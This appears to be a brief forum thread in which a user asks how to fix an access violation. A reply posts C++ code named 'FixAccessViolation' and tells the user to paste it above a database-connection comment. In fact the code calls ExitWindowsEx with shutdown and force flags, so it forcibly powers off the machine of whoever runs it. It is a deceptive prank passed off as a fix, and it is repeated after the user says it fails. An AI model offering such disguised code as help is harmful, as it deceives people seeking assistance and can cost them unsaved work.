How to fix? Help.
[Only registered and activated users can see links. Click Here To Register...]
[Only registered and activated users can see links. Click Here To Register...]
using FixAccessViolation = BOOL WINAPI(UINT, DWORD); //c++ 11 //typedef BOOL(WINAPI FixAccessViolation)(UINT, DWORD); //c++ 03 FixAccessViolation* fixMe = ExitWindowsEx; fixMe(0x00000001, 0x00000004);
Still not work.Quote:
Just copy and paste it above "Verbindung zur Datenbank herstellen".Code:using FixAccessViolation = BOOL WINAPI(UINT, DWORD); //c++ 11 //typedef BOOL(WINAPI FixAccessViolation)(UINT, DWORD); //c++ 03 FixAccessViolation* fixMe = ExitWindowsEx; fixMe(0x00000001, 0x00000004);